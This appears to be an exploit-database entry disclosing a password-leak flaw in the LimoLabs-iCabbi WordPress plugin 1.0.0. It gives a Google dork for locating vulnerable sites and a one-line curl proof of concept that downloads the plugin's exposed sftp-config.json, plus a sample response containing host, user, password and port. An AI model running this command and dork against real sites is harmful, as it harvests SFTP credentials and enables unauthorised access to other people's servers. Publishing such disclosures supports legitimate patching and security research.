WordPress LimoLabs 1.0.0 Remote Password Disclosure Vulnerability

2018-07-24
ID: 98691
CVE: None
Download vulnerable application: None
# Exploit Title: Wordpress Plugin LimoLabs-iCabbi Remote Password Disclosure
# Google Dork: inurl:"plugins/limolabs-icabbi"
# Exploit Author: Gabriel Lipski ( gabriel.lipski[AT]protonmail.com )
 # Vendor Homepage: https://www.icabbi.com
# Tested on: Ubuntu 12.04.5 / Debian 9.4
 * PoC:
 $ curl http://<TARGET>/wp-content/plugins/limolabs-icabbi/sftp-config.json
 * Response:
 ...
     "host": "1.3.3.7",
    "user": "foo",
    "password": "bar",
    "port": "22",
 ...
1-4-2 (www01)